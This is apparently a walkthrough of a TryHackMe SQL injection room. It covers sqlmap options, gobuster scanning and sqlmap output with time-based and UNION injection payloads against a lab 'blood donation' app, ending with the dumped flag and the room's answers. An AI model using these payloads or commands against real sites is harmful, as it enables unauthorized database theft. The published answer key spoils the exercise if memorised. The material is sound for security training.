Learn about and use Sqlmap to exploit the web application
site Link: https://tryhackme.com/r/room/sqlmap
Task 1 Introduction
In this room, we will learn about sqlmap and how it can be used to exploit SQL Injection vulnerabilities.
What is sqlmap?
sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Installing Sqlmap
If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap
Answer the questions below
Read the above and have sqlmap at the ready.
Task 2 Using Sqlmap
Sqlmap Commands
To show the basic help menu, simply type sqlmap -h in the terminal.
Help Message
nare@nare$ sqlmap -h
___
__H__
___ ___[']_____ ___ ___ {1.6#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.orgUsage: python3 sqlmap [options]Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1) Target:
At least one of these options has to be provided to define the
target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs Request:
These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value Detection:
These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1) Techniques:
These options can be used to tweak testing of specific SQL injection
techniques --technique=TECH.. SQL injection techniques to use (default "BEUSTQ") Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables -a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate Operating system access:
These options can be used to access the back-end database management
system underlying operating system --os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC General:
These options can be used to set some general working parameters --batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target Miscellaneous:
These options do not fit into any other category --wizard Simple wizard interface for beginner users[!] to see full list of options run with '-hh'
Basic commands:
Enumeration commands:
These options can be used to enumerate the back-end database management system information, structure, and data contained in tables.
Operating System access commands
These options can be used to access the back-end database management system on the target operating system.
Note that the tables shown above aren’t all the possible switches to use with sqlmap. For a more extensive list of options, run sqlmap -hh to display the advanced help message.
Now that we’ve seen some of the options we can use with sqlmap, let’s jump into the examples using both GET and POST Method based requests.
Simple HTTP GET Based Test
sqlmap -u https://testsite.com/page.php?id=7 --dbs
Here we have used two flags: -u to state the vulnerable URL and — dbs to enumerate the database.
Simple HTTP POST Based Test
First, we need to identify the vulnerable POST request and save it. In order to save the request, Right Click on the request, select ‘Copy to file’, and save it to a directory. You could also copy the whole request and save it to a text file as well.
You’ll notice in the request above, we have a POST parameter ‘blood_group’ which could a vulnerable parameter.
SavedHTTPPOST request
nare@nare$ cat req.txt
POST /blood/nl-search.php HTTP/1.1
Host: 10.10.17.116
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.17.116
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.17.116/blood/nl-search.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=bt0q6qk024tmac6m4jkbh8l1h4
Connection: closeblood_group=B%2BNow that we’ve identified a potentially vulnerable parameter, let’s jump into the sqlmap and use the following command:
sqlmap -r req.txt -p blood_group --dbs
sqlmap -r <request_file> -p <vulnerable_parameter> --dbs
Here we have used two flags: -r to read the file, -p to supply the vulnerable parameter, and — dbs to enumerate the database.
Database Enumeration
nare@nare$ sqlmap -r req.txt -p blood_group --dbs
[19:31:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:31:50] [INFO] POST parameter 'blood_group' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:33:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:33:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:33:09] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:33:09] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[19:33:10] [WARNING] reflective value(s) found and filtering out
[19:33:12] [INFO] target URL appears to be UNION injectable with 8 columns
[19:33:13] [INFO] POST parameter 'blood_group' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'blood_group' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: blood_group (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blood_group=B+' AND (SELECT 3897 FROM (SELECT(SLEEP(5)))Zgvj) AND 'gXEj'='gXEj Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: blood_group=B+' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767a71,0x58784e494a4c43546361475a45546c676e736178584f517a457070784c616b4849414c69594c6371,0x71716a7a71)-- -
---
[19:33:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.12
[19:33:17] [INFO] fetching database names
available databases [6]:
[*] blood
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] testNow that we have the databases, let’s extract tables from the database blood.
Using GET based Method
sqlmap -u https://testsite.com/page.php?id=7 -D blood --tables
sqlmap -u https://testsite.com/page.php?id=7 -D <database_name> --tables
Using POST based Method
sqlmap -r req.txt -p blood_group -D blood --tables
sqlmap -r req.txt -p <vulnerable_parameter> -D <database_name> --tables
Once we run these commands, we should get the tables.
Getting Tables
nare@nare$ sqlmap -r req.txt -p blood_group -D blood --tables
[19:35:57] [INFO] parsing HTTP request from 'req.txt'
[19:35:57] [INFO] resuming back-end DBMS 'mysql'
[19:35:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: blood_group (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blood_group=B+' AND (SELECT 3897 FROM (SELECT(SLEEP(5)))Zgvj) AND 'gXEj'='gXEj Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: blood_group=B+' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767a71,0x58784e494a4c43546361475a45546c676e736178584f517a457070784c616b4849414c69594c6371,0x71716a7a71)-- -
---
[19:35:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.12
[19:35:58] [INFO] fetching tables for database: 'blood'
[19:35:58] [WARNING] reflective value(s) found and filtering out
Database: blood
[3 tables]
+----------+
| blood_db |
| flag |
| users |
+----------+Once we have available tables, now let’s gather the columns from the table blood_db.
Using GET based Method
sqlmap -u https://testsite.com/page.php?id=7 -D blood -T blood_db --columns
sqlmap -u https://testsite.com/page.php?id=7 -D <database_name> -T <table_name> --columns
Using POST based Method
sqlmap -r req.txt -D blood -T blood_db --columns
sqlmap -r req.txt -D <database_name> -T <table_name> --columns
Getting Tables
nare@nare$ sqlmap -r req.txt -D blood -T blood_db --columns
[19:35:57] [INFO] parsing HTTP request from 'req.txt'
[19:35:57] [INFO] resuming back-end DBMS 'mysql'
[19:35:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: blood_group (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blood_group=B+' AND (SELECT 3897 FROM (SELECT(SLEEP(5)))Zgvj) AND 'gXEj'='gXEj Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: blood_group=B+' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767a71,0x58784e494a4c43546361475a45546c676e736178584f517a457070784c616b4849414c69594c6371,0x71716a7a71)-- -
---
[19:35:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.12
[19:35:58] [INFO] fetching tables for database: 'blood'
[19:35:58] [WARNING] reflective value(s) found and filtering out
Database: blood
[3 tables]
+----------+
| blood_db |
| flag |
| users |
+----------+Or we can simply dump all the available databases and tables using the following commands.
Using GET based Method
sqlmap -u https://testsite.com/page.php?id=7 -D <database_name> --dump-all
sqlmap -u https://testsite.com/page.php?id=7 -D blood --dump-all
Using POST based Method
sqlmap -r req.txt -D <database_name> --dump-all
sqlmap -r req.txt-p -D <database_name> --dump-all
I hope you have enjoyed seeing the basics of using sqlmap and its various commands. Now, let’s start the challenge in the next task!
Answer the questions below
2.1 Which flag or option will allow you to add a URL to the command?
Answer: -u
2.3 Which flag would you use to add data to a POST request?
Answer: — data
2.4 There are two parameters: username and password. How would you tell sqlmap to use the username parameter for the attack?
Answer: -p username
2.5 Which flag would you use to show the advanced help menu?
Answer: -hh
2.6 Which flag allows you to retrieve everything?
Answer: -a
2.7 Which flag allows you to select the database name?
Answer: -D
2.8 Which flag would you use to retrieve database tables?
Answer: — tables
2.9 Which flag allows you to retrieve a table’s columns?
Answer: — columns
2.10 Which flag allows you to dump all the database table entries?
Answer: — dump-all
2.11 Which flag will give you an interactive SQL Shell prompt? (Question Hint Use advance help)
Answer: — sql-shell
2.12 You know the current db type is ‘MYSQL’. Which flag allows you to enumerate only MySQL databases? (Question Hint All lowercase)
Answer: — dbms=MySQL
Task 3 SQLMap Challenge
Deploy the machine attached to this task, then navigate to MACHINE_IP (this machine can take up to 3 minutes to boot)
Task:
We have deployed an application to collect ‘Blood Donations’. The request seems to be vulnerable.
Exploit a SQL Injection vulnerability on the vulnerable application to find the flag.
Run Gobuster to scan for hidden directories on the web application
gobuster dir -u http://MACHINE_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
gobuster dir -u http://10.10.238.78 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
-u http://MACHINE_IP: Specifies the URL of the target machine. ReplaceMACHINE_IPwith the actual IP address of the machine.-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: This wordlist (directory-list-2.3-medium.txt) is larger and more comprehensive than the common wordlist used in the previous example, which can help discover more directories.-t 100: This sets the number of threads to 100. Increasing the number of threads speeds up the scan by making more requests concurrently. Be cautious, as this can overwhelm some servers if they can't handle the load, leading to false positives or missed directories.
The results show that Gobuster found an interesting directory: /blood with a status code of 301, which indicates a redirection.
Answer the questions below
3.1 What is the name of the interesting directory ? (Question Hint use gobuster)
Answer: blood
Open your browser and navigate http://<MACHINE_IP>/blood
curl http://<MACHINE_IP>/blood
The result shows that /blood directory is responding with a 301 Moved Permanently status, which means the content is being redirected to another location.
To get to the actual page, add the -L flag to the curl command, which tells curl to follow the redirect automatically
curl -L http://<MACHINE_IP>/blood
curl -L http://10.10.238.78/blood
the result shows the content of the /blood page, it appears to have a search function for different blood groups. This is a classic target for SQL injection, as the form takes user input (the blood group) and processes it.
Now Open your browser and go to the vulnerable http://<MACHINE_IP>/blood page
http://<MACHINE_IP>/blood page
Fill out the form (select a blood group like “B+” or “A+”) and submit it.
Capture the POST request that was made when you clicked the “Search” button
Press F12 or right-click on the page and choose Inspect to open Developer Tools and Navigate to the Network tab in Developer Tools.
Submit the form again by selecting the blood group and click search once more. This will trigger the POST request.
In the Network tab, look for the POST request that was made to nl-search.php (the form action).
- Right-click the request and select Copy as cURL.
Open your terminal and create a new file to save the request with the text editor
nano request.txtPaste the copied cURL command into the text editor
POST /blood/nl-search.php HTTP/1.1
Host: 10.10.238.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://10.10.238.78
Connection: keep-alive
Referer: http://10.10.238.78/blood/nl-search.php
Cookie: PHPSESSID=godfq0iqs4sf4c2448f12cose6
Upgrade-Insecure-Requests: 1
Content-Length: 16
blood_group=A%2BIn the blood_group=A%2B, %2B is the URL-encoded value for the + character. We’ll want to simplify it and use blood_group=A+ in the body.
Change line blood_group=A%2B to blood_group=A+
POST /blood/nl-search.php HTTP/1.1
Host: 10.10.238.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://10.10.238.78
Connection: keep-alive
Referer: http://10.10.238.78/blood/nl-search.php
Cookie: PHPSESSID=godfq0iqs4sf4c2448f12cose6
Upgrade-Insecure-Requests: 1
Content-Length: 16
blood_group=A+Save the file by pressing CTRL + O, then press Enter, and exit the editor by pressing CTRL + X.
Check the blood_group parameter for SQL injection vulnerabilities and attempt to enumerate the databases.
sqlmap -r request.txt -p blood_group --dbs
The result shows
- he back-end database is MySQL.
- The web server is running Linux Ubuntu with Nginx.
The list of databases:
- blood
- information_schema
- mysql
- performance_schema
- sys
- test
sqlmap -r request.txt -p blood_group --current-user
3.2 Who is the current db user?
Answer: root
List the tables in the blood database
sqlmap -r request.txt -p blood_group -D blood --tables
The database contains the following tables:
- blood_db
- flag
- users
Retrieve the columns in the flag table
sqlmap -r request.txt -p blood_group -D blood -T flag - columns
The result shows that the data has been saved in /root/.sqlmap/output/10.10.238.78
Dump the contents of the flag table
sqlmap -r request.txt -p blood_group -D blood -T flag --dump
3.3 What is the final flag?
Answer: thm{sqlm@p_is_L0ve}
